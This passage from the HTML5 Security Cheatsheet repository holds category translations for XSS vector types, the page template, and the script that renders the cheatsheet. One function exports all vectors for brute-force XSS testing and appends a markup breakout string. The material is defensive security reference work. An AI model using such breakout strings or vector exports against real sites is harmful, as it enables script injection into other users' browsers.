104 |         'tr' : 'UTF-7 ve diğer egzotik karakter kodlamaları tabanlı vektörler',
105 | 		'zh' : 'UTF-7和其它诡异的编码集的向量'
106 |     },
107 |     'dos'           : {
108 |         'en' : 'Client side denial of service vectors',
109 |         'ja' : '\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u30b5\u30a4\u30c9\u3067\u306e\u30b5\u30fc\u30d3\u30b9\u4e0d\u80fd(DoS)',
110 |         'ru' : 'DoS',
111 |         'cs' : 'Útoky DoS zaměřené na klienta',
112 |         'de' : '',
113 |         'tr' : 'İstemci taraflı servis durdurdma (DoS) vektörleri',
114 |         'zh' : '客户端DOS向量'
115 |     },
116 |     'behavior'  : {
117 |         'en' : 'HTML behavior and binding vectors',
118 |         'ja' : 'HTML behavior \u306b\u3088\u308b\u624b\u6cd5',
119 |         'ru' : 'Поведения и связывание данных',
120 |         'cs' : 'Útoky využívající HTML behavior a binding',
121 |         'de' : '',
122 |         'tr' : 'HTML behavior ve binding vektörleri',
123 | 		'zh' : 'HTML behavior和binding相关向量'
124 |     },
125 |     'clickjacking'  : {
126 |         'en' : 'Clickjacking and UI Redressing vectors',
127 |         'ja' : '',
128 |         'ru' : 'Перехват нажатий и подмена интерфейса',
129 |         'cs' : '',
130 |         'de' : '',
131 |         'tr' : 'Clickjacking ve Kullanıcı Arabirimi değiştirme vektörleri',
132 | 		'zh' : 'Clickjacking和UI Redressing的向量'
133 |     }
134 | }
135 | }));
136 | 


--------------------------------------------------------------------------------
/html/images/chrome.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/chrome.png


--------------------------------------------------------------------------------
/html/images/cn.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/cn.png


--------------------------------------------------------------------------------
/html/images/cs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/cs.png


--------------------------------------------------------------------------------
/html/images/en.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/en.png


--------------------------------------------------------------------------------
/html/images/firefox.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/firefox.png


--------------------------------------------------------------------------------
/html/images/ie.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/ie.png


--------------------------------------------------------------------------------
/html/images/ja.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/ja.png


--------------------------------------------------------------------------------
/html/images/opera.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/opera.png


--------------------------------------------------------------------------------
/html/images/ru.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/ru.png


--------------------------------------------------------------------------------
/html/images/safari.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/safari.png


--------------------------------------------------------------------------------
/html/images/search.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/search.png


--------------------------------------------------------------------------------
/html/images/tr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cure53/H5SC/1a91bbc085426579ebcdefb1bc5450760db3dad5/html/images/tr.png


--------------------------------------------------------------------------------
/html/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <meta charset="UTF-8" />
 5 |         <title>HTML5 Security Cheatsheet</title>
 6 |         <!-- major includes -->
 7 |         <script type="text/javascript" src="https://rawgithub.com/cure53/H5SC/master/items.js"></script>
 8 |         <script type="text/javascript" src="https://rawgithub.com/cure53/H5SC/master/categories.js"></script>
 9 |         <script type="text/javascript" src="https://rawgithub.com/cure53/H5SC/master/payloads.js"></script>
10 |         <script type="text/javascript" src="https://rawgithub.com/cure53/H5SC/master/html/scripts/jquery.js"></script>
11 |         <script type="text/javascript" src="https://rawgithub.com/cure53/H5SC/master/html/scripts/import.js"></script>
12 |         <link rel="stylesheet" type="text/css" href="styles/basic.css" />
13 |     </head>
14 |     <body>
15 |         <h1>HTML5 Security Cheatsheet<small>What your browser does when you look away...</small></h1>
16 |         <a href="https://github.com/cure53/H5SC"><img style="position: absolute; top: 0; left: 0; border: 0;" src="https://camo.githubusercontent.com/82b228a3648bf44fc1163ef44c62fcc60081495e/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f6c6566745f7265645f6161303030302e706e67" alt="Fork me on GitHub" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_left_red_aa0000.png"></a>
17 |         <div id="content"><!-- data will go here --></div>
18 | 		<div id="sidebar">
19 | 		    <div id="languages">
20 |                 <a rel="en" href=""><img src="images/en.png" alt="english" /></a>
21 |                 <a rel="ja" href=""><img src="images/ja.png" alt="japanese" /></a>
22 |                 <a rel="ru" href=""><img src="images/ru.png" alt="russian" /></a>
23 |                 <a rel="cs" href=""><img src="images/cs.png" alt="czech" /></a>
24 |                 <a rel="tr" href=""><img src="images/tr.png" alt="turkish" /></a>
25 | 				<a rel="cn" href=""><img src="images/cn.png" alt="chinsese" /></a>
26 |             </div>
27 | 		    <input type="text" accesskey="s" tabindex="1" id="search" placeholder="Search" />
28 |             <span class="clear"></span>
29 |             <!-- navi will go here -->
30 |         </div>
31 |         <div id="templates" style="display:none">
32 |             <!-- invisible templates for the JSON data -->
33 |             <div id="item_template">
34 |                 <div class="item">
35 |                     <h4 class="name">%name%</h4><p class="description">%desription%</p>
36 |                     <code class="data">%data%</code><p class="howtofix">%howtofix%</p>
37 |                     <code class="attachment"></code>
38 |                     <ul class="browsers"></ul><ul class="tags"></ul><ul class="urls"></ul>
39 |                     <dfn class="reporter">%reporter%</dfn>
40 |                  </div>
41 |             </div>
42 |             <ul id="category_template"></ul>
43 |             <ul id="navigation_template"></ul>	
44 |         </div>
45 |         <div id="offline" style="display:none">Offline Mode</div>
46 |         <noscript>Please enable JavaScript</noscript>
47 |         <!-- impressum & datenschutz -->
48 |         <div id="imprint" style="position:fixed; bottom: 0px; right: 0px; padding: 10px;border: 1px solid #666">
49 |         <a href="https://cure53.de/impressum.html">Impressum</a>
50 |         <a href="https://cure53.de/datenschutz.html">Datenschutz</a>
51 |         </div>
52 |     </body>
53 | </html>


--------------------------------------------------------------------------------
/html/scripts/import.js:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * Import script for the HTML5 Security Cheatsheet HTML version
  3 |  */
  4 | (function(){
  5 |     window.onload = function() {
  6 |         // sanitize
  7 |         var sanitize = function(input){
  8 |             output = input.replace(/&/gm, '&amp;')
  9 |                 .replace(/</gm, '&lt;').replace(/>/gm, '&gt;');              
 10 |             return output;
 11 |         };
 12 |         // rudimentary off-line support
 13 |         (function(){
 14 |             var offline = function(){
 15 |                 var store = JSON.parse(localStorage[location.hostname]);
 16 |                 items = store.items; 
 17 |                 categories = store.categories;
 18 |                 payloads = store.payloads;
 19 |                 $('#offline').show();
 20 |             }; 
 21 |             if(navigator.onLine || typeof navigator.onLine === 'undefined') {
 22 |             	try {
 23 | 	                localStorage[location.hostname]=JSON.stringify(
 24 | 	                    {'items':items,'payloads':payloads,'categories':categories}
 25 | 	                );
 26 | 	                $(window).bind('offline', offline);
 27 | 	                $(window).bind('online', function(){$('#offline').hide()})
 28 | 	                $('#offline').hide();
 29 | 	            } catch(e){}
 30 |             } else {
 31 |                 offline();
 32 |             }   
 33 |         })();        
 34 |         // categories
 35 |         (function() {
 36 |             // enumerate categories and build initial lists
 37 |             for(var category in categories) {
 38 |                 // determine cookie or navigator language or set default
 39 |                 if (/lang=\w{2}/.test(document.cookie)) {
 40 |                     var lang = document.cookie.match(/lang=(\w{2})/)[1];
 41 |                 }
 42 |                 else {
 43 | 					var userLang = navigator.language||navigator.browserLanguage;
 44 |                     var lang = userLang ? userLang.match(/(\w{2})/)[1] : 'en';
 45 |                 }
 46 |                 if(typeof categories[category][lang] === 'undefined' 
 47 |                     || !categories[category][lang]) {
 48 |                     lang = 'en';
 49 |                 }
 50 |                 // check if translated items exist
 51 |                 if (typeof categories[category][lang] === 'string') {
 52 |                     $('#content').append('<li id="' + category + '"><h3>' 
 53 |                         + categories[category][lang] + '</h3></li>');
 54 |                     $('#sidebar').append('<li><a href="#' + category + '">' 
 55 |                         + categories[category][lang] + '</a></li>');
 56 |                 }
 57 |             }
 58 |             $('#content li').wrap('<ul/>');
 59 |             $('#sidebar li').wrap('<ul/>');
 60 |         })();
 61 |         // content
 62 |         (function() {
 63 |             for (var item in items) {
 64 |                 // replace the payload templates
 65 |                 for (var payload in payloads) {
 66 |                     var regex = new RegExp('%' + payload + '%', 'gm');
 67 |                     items[item].data = items[item].data.replace(regex, payloads[payload]);
 68 |                     if(items[item].attachment && items[item].attachment.raw) {
 69 |                         items[item].attachment.raw = items[item].attachment
 70 |                             .raw.replace(regex, payloads[payload]);                        
 71 |                     }
 72 |                 }
 73 |                 // build markup container for the content
 74 |                 var li = $('#content li#'+items[item].category+' h3');
 75 |                 var container = $($('#item_template').html());
 76 |                 
 77 |                 // enable direct vector navi by id
 78 |                 container.prepend('<a name="'+items[item].id+'"></a>');
 79 |                 for(var c in items[item]) {
 80 |                     // determine cookie or navigator language or set default
 81 |                     if (/lang=\w{2}/.test(document.cookie)) {
 82 |                         var lang = document.cookie.match(/lang=(\w{2})/)[1];
 83 |                     }
 84 |                     else {
 85 |                         var userLang = navigator.language||navigator.browserLanguage;
 86 |                         var lang = userLang ? userLang.match(/(\w{2})/)[1] : 'en';
 87 |                     }
 88 |                     if(typeof items[item][c][lang] === 'undefined' 
 89 |                         || !items[item][c][lang]) {
 90 |                         lang = 'en';
 91 |                     }
 92 |                     // check if translated items exist
 93 |                     if(typeof items[item][c][lang] === 'string') {
 94 |                         container.find('.'+c).html(sanitize(items[item][c][lang]));
 95 |                         if(c === 'name'){
 96 |                             container.find('.'+c).append('<a href="#'+items[item]['id']
 97 |                                 +'">#'+items[item]['id']+'</a>');
 98 |                             container.find('.'+c).append('<a target="_blank" href="test/#'+items[item]['id']
 99 |                                 +'">test</a>')                                
100 |                         }
101 |                     } else if(typeof items[item][c] === 'string') {
102 |                         container.find('.'+c).html(sanitize(items[item][c]));   
103 |                     }
104 |                 }
105 |                 // check for attachment data
106 |                 if(items[item].attachment) {
107 |                     container.find('.attachment').show()
108 |                         .append(sanitize(items[item].attachment.raw));
109 |                     for(var meta in items[item].attachment) {
110 |                         if(meta !== 'raw' && meta !== 'path' && items[item].attachment[meta]) {
111 |                             container.find('.attachment').append(
112 |                                 '<span class="mime">'+meta+': '+sanitize(items[item]
113 |                                     .attachment[meta])+'</span>'
114 |                             );
115 |                         } else if(meta === 'path' && items[item].attachment[meta]) {
116 |                             container.find('.attachment').append(
117 |                                 '<span class="mime">'+meta+': <a href="'
118 |                                     + sanitize(items[item].attachment[meta])
119 |                                     + '" target="_blank">'
120 |                                     + sanitize(items[item].attachment[meta])
121 |                                 + '</a></span>'
122 |                             );                            
123 |                         }
124 |                     }
125 |                 } else {
126 |                     container.find('.attachment').remove();
127 |                 }
128 |                 // fill browser list
129 |                 if(items[item].browsers) {
130 |                     for(var browser in items[item].browsers) {
131 |                          container.find('.browsers').append('<ul class="'+browser+'" />');
132 |                          var versions = items[item].browsers[browser];
133 |                          for(var i in versions) {
134 |                              if(versions[i] == 'end') continue;
135 |                              var short_browser = browser.replace(/^(\w+)\s\w+/, '$1'); 
136 |                              container.find('.browsers .'+short_browser).append(
137 |                                  (versions[+i + 1] == 'end' ? '<li class="end">' : '<li>') 
138 |                                  + browser + ' ' + versions[i] + '</li>'    
139 |                              )
140 |                             
141 |                         }
142 |                     }
143 |                     container.find('.browsers').append('<span class="clear"></span>');
144 |                 }   
145 |                 // fill tag list
146 |                 if(items[item].tags) {
147 |                     for(var tag in items[item].tags) {
148 |                         container.find('.tags')
149 |                             .append('<li>'+items[item].tags[tag]+'</li>');
150 |                     } 
151 |                     container.find('.tags')
152 |                         .append('<span class="clear"></span>');
153 |                 }   
154 |                 // fill url list
155 |                 if(items[item].urls) {
156 |                     for(var url in items[item].urls) {
157 |                         container.find('.urls').append(
158 |                             '<li><a href="'+items[item].urls[url]
159 |                                 // internal url in same tab
160 |                                 + (items[item].urls[url].charAt(0)=='#'
161 |                                       ?'">'
162 |                                       :'" target="_blank">')
163 |                                 + items[item].urls[url]+'</a></li>'
164 |                         );
165 |                     } 
166 |                 } 
167 |                 li.parent().append(container);
168 |             }
169 |             // enable direct jumps via hash url
170 |             if(location.hash && location.hash.match(/^#\w+$/)) {
171 |                 location=location.hash;
172 |             }
173 |         })();
174 |         // search functionality
175 |         (function(){
176 |             $('ul.tags li, ul.browsers li').click(function(){
177 |                 $('#search').val($(this).html()).keyup();        
178 |             });
179 |             $('#search').keyup(function(){
180 |                 var term = $('#search').val();
181 |                 term = sanitize(term.replace(/([\[\]\(\\)\{\}\+\-])/gm, '\\$1'));
182 |                 if(term) {
183 |                     if(typeof to !== 'undefined') {
184 |                         clearTimeout(to);
185 |                     }
186 |                     to = setTimeout(function(){
187 |                         $('div.item').each(function(){
188 |                             if($(this).html().match(new RegExp(term, 'gim'))) {
189 |                                 $(this).show();
190 |                                 $(document).scrollTop(
191 |                                     $('div.item:visible').first().attr('scrollHeight')
192 |                                 );                            
193 |                             } else {$(this).hide()}
194 |                         });                        
195 |                     }, 500);
196 |                     
197 |                 } else {$('div.item').show()}
198 |             });
199 |             $('#search').dblclick(function(){
200 |                 $(this).val('').keyup();
201 |             }); 
202 |             $('#sidebar a').click(function(){
203 |                 $('#search').val('').keyup();
204 |             }); 
205 |             // enable direct jumps via hash url
206 |             if(location.search) {
207 |                 var search = unescape(location.search.replace(/^\?/, ''));
208 |                 $('#search').val(search).keyup();
209 |             }
210 |         })();
211 |         // language switch
212 |         (function(){
213 |             $('#languages a').click(function(){
214 |                 document.cookie='lang='+$(this).attr('rel');
215 |             });
216 |         })();
217 |     };
218 |     /**
219 |      * Export all vectors for brute-force XSS Tests
220 |      */
221 |     window.vectors = function(){
222 |     	for(i in items){
223 |     		i = parseInt(i, 10);
224 |     		var vector = items[i].data;
225 |     		vector = vector.replace(/(?:alert|write)\(1\)/gim, 'alert('+(i+1)+')');
226 | 			console.log('<div id="'+(i+1)+'">'+vector+'//["\'`-->]]>]</div>');
227 |     	}
228 |     }
229 | })();
230 | 


--------------------------------------------------------------------------------
/html/scripts/jquery.js:
--------------------------------------------------------------------------------
1 | /*! jQuery v1.11.0 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */
2 | !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k="".trim,l={},m="1.11.0",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(e=arguments[h]))for(d in e)a=g[d],c=e[d],g!==c&&(j&&c&&(n.isPlainObject(c)||(b=n.isArray(c)))?(b?(b=!1,f=a&&n.isArray(a)?a:[]):f=a&&n.isPlainObject(a)?a:{},g[d]=n.extend(j,f,c)):void 0!==c&&(g[d]=c));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray||function(a){return"array"===n.type(a)},isWindow:function(a){return null!=a&&a==a.window},isNumeric:function(a){return a-parseFloat(a)>=0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},isPlainObject:function(a){var b;if(!a||"object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;try{if(a.constructor&&!j.call(a,"constructor")&&!j.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}if(l.ownLast)for(b in a)return j.call(a,b);for(b in a);return void 0===b||j.call(a,b)},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(b){b&&n.trim(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=s(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:k&&!k.call("\ufeff\xa0")?function(a){return null==a?"":k.call(a)}:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){var d;if(b){if(g)return g.call(b,a,c);for(d=b.length,c=c?0>c?Math.max(0,d+c):c:0;d>c;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,b){var c=+b.length,d=0,e=a.length;while(c>d)a[e++]=b[d++];if(c!==c)while(void 0!==b[d])a[e++]=b[d++];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=s(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(f=a[b],b=a,a=f),n.isFunction(a)?(c=d.call(arguments,2),e=function(){return a.apply(b||this,c.concat(d.call(arguments)))},e.guid=a.guid=a.guid||n.guid++,e):void 0},now:function(){return+new Date},support:l}),n.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function s(a){var b=a.length,c=n.type(a);return"function"===c||n.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var t=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s="sizzle"+-new Date,t=a.document,u=0,v=0,w=eb(),x=eb(),y=eb(),z=function(a,b){return a===b&&(j=!0),0},A="undefined",B=1<<31,C={}.hasOwnProperty,D=[],E=D.pop,F=D.push,G=D.push,H=D.slice,I=D.indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(this[b]===a)return b;return-1},J="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",K="[\\x20\\t\\r\\n\\f]",L="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",M=L.replace("w","w#"),N="\\["+K+"*("+L+")"+K+"*(?:([*^$|!~]?=)"+K+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+M+")|)|)"+K+"*\\]",O=":("+L+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+N.replace(3,8)+")*)|.*)\\)|)",P=new RegExp("^"+K+"+|((?:^|[^\\\\])(?:\\\\.)*)"+K+"+$","g"),Q=new RegExp("^"+K+"*,"+K+"*"),R=new RegExp("^"+K+"*([>+~]|"+K+")"+K+"*"),S=new RegExp("="+K+"*([^\\]'\"]*?)"+K+"*\\]","g"),T=new RegExp(O),U=new RegExp("^"+M+"$"),V={ID:new RegExp("^#("+L+")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L.replace("w","w*")+")"),ATTR:new RegExp("^"+N),PSEUDO:new RegExp("^"+O),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K+"*\\)|)","i"),bool:new RegExp("^(?:"+J+")$","i"),needsContext:new RegExp("^"+K+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+K+"*((?:-\\d)?\\d*)"+K+"*\\)|)(?=[^-]|$)","i")},W=/^(?:input|select|textarea|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,$=/[+~]/,_=/'|\\/g,ab=new RegExp("\\\\([\\da-f]{1,6}"+K+"?|("+K+")|.)","ig"),bb=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)};try{G.apply(D=H.call(t.childNodes),t.childNodes),D[t.childNodes.length].nodeType}catch(cb){G={apply:D.length?function(a,b){F.apply(a,H.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function db(a,b,d,e){var f,g,h,i,j,m,p,q,u,v;if((b?b.ownerDocument||b:t)!==l&&k(b),b=b||l,d=d||[],!a||"string"!=typeof a)return d;if(1!==(i=b.nodeType)&&9!==i)return[];if(n&&!e){if(f=Z.exec(a))if(h=f[1]){if(9===i){if(g=b.getElementById(h),!g||!g.parentNode)return d;if(g.id===h)return d.push(g),d}else if(b.ownerDocument&&(g=b.ownerDocument.getElementById(h))&&r(b,g)&&g.id===h)return d.push(g),d}else{if(f[2])return G.apply(d,b.getElementsByTagName(a)),d;if((h=f[3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(h)),d}if(c.qsa&&(!o||!o.test(a))){if(q=p=s,u=b,v=9===i&&a,1===i&&"object"!==b.nodeName.toLowerCase()){m=ob(a),(p=b.getAttribute("id"))?q=p.replace(_,"\\$&"):b.setAttribute("id",q),q="[id='"+q+"'] ",j=m.length;while(j--)m[j]=q+pb(m[j]);u=$.test(a)&&mb(b.parentNode)||b,v=m.join(",")}if(v)try{return G.apply(d,u.querySelectorAll(v)),d}catch(w){}finally{p||b.removeAttribute("id")}}}return xb(a.replace(P,"$1"),b,d,e)}function eb(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function fb(a){return a[s]=!0,a}function gb(a){var b=l.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function hb(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function ib(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||B)-(~a.sourceIndex||B);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function jb(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function kb(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function lb(a){return fb(function(b){return b=+b,fb(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function mb(a){return a&&typeof a.getElementsByTagName!==A&&a}c=db.support={},f=db.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},k=db.setDocument=function(a){var b,e=a?a.ownerDocument||a:t,g=e.defaultView;return e!==l&&9===e.nodeType&&e.documentElement?(l=e,m=e.documentElement,n=!f(e),g&&g!==g.top&&(g.addEventListener?g.addEventListener("unload",function(){k()},!1):g.attachEvent&&g.attachEvent("onunload",function(){k()})),c.attributes=gb(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=gb(function(a){return a.appendChild(e.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=Y.test(e.getElementsByClassName)&&gb(function(a){return a.innerHTML="<div class='a'></div><div class='a i'></div>",a.firstChild.className="i",2===a.getElementsByClassName("i").length}),c.getById=gb(function(a){return m.appendChild(a).id=s,!e.getElementsByName||!e.getElementsByName(s).length}),c.getById?(d.find.ID=function(a,b){if(typeof b.getElementById!==A&&n){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ab,bb);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(ab,bb);return function(a){var c=typeof a.getAttributeNode!==A&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return typeof b.getElementsByTagName!==A?b.getElementsByTagName(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return typeof b.getElementsByClassName!==A&&n?b.getElementsByClassName(a):void 0},p=[],o=[],(c.qsa=Y.test(e.querySelectorAll))&&(gb(function(a){a.innerHTML="<select t=''><option selected=''></option></select>",a.querySelectorAll("[t^='']").length&&o.push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||o.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll(":checked").length||o.push(":checked")}),gb(function(a){var b=e.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&o.push("name"+K+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||o.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),o.push(",.*:")})),(c.matchesSelector=Y.test(q=m.webkitMatchesSelector||m.mozMatchesSelector||m.oMatchesSelector||m.msMatchesSelector))&&gb(function(a){c.disconnectedMatch=q.call(a,"div"),q.call(a,"[s!='']:x"),p.push("!=",O)}),o=o.length&&new RegExp(o.join("|")),p=p.length&&new RegExp(p.join("|")),b=Y.test(m.compareDocumentPosition),r=b||Y.test(m.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},z=b?function(a,b){if(a===b)return j=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===e||a.ownerDocument===t&&r(t,a)?-1:b===e||b.ownerDocument===t&&r(t,b)?1:i?I.call(i,a)-I.call(i,b):0:4&d?-1:1)}:function(a,b){if(a===b)return j=!0,0;var c,d=0,f=a.parentNode,g=b.parentNode,h=[a],k=[b];if(!f||!g)return a===e?-1:b===e?1:f?-1:g?1:i?I.call(i,a)-I.call(i,b):0;if(f===g)return ib(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)k.unshift(c);while(h[d]===k[d])d++;return d?ib(h[d],k[d]):h[d]===t?-1:k[d]===t?1:0},e):l},db.matches=function(a,b){return db(a,null,null,b)},db.matchesSelector=function(a,b){if((a.ownerDocument||a)!==l&&k(a),b=b.replace(S,"='$1']"),!(!c.matchesSelector||!n||p&&p.test(b)||o&&o.test(b)))try{var d=q.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return db(b,l,null,[a]).length>0},db.contains=function(a,b){return(a.ownerDocument||a)!==l&&k(a),r(a,b)},db.attr=function(a,b){(a.ownerDocument||a)!==l&&k(a);var e=d.attrHandle[b.toLowerCase()],f=e&&C.call(d.attrHandle,b.toLowerCase())?e(a,b,!n):void 0;return void 0!==f?f:c.attributes||!n?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},db.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},db.uniqueSort=function(a){var 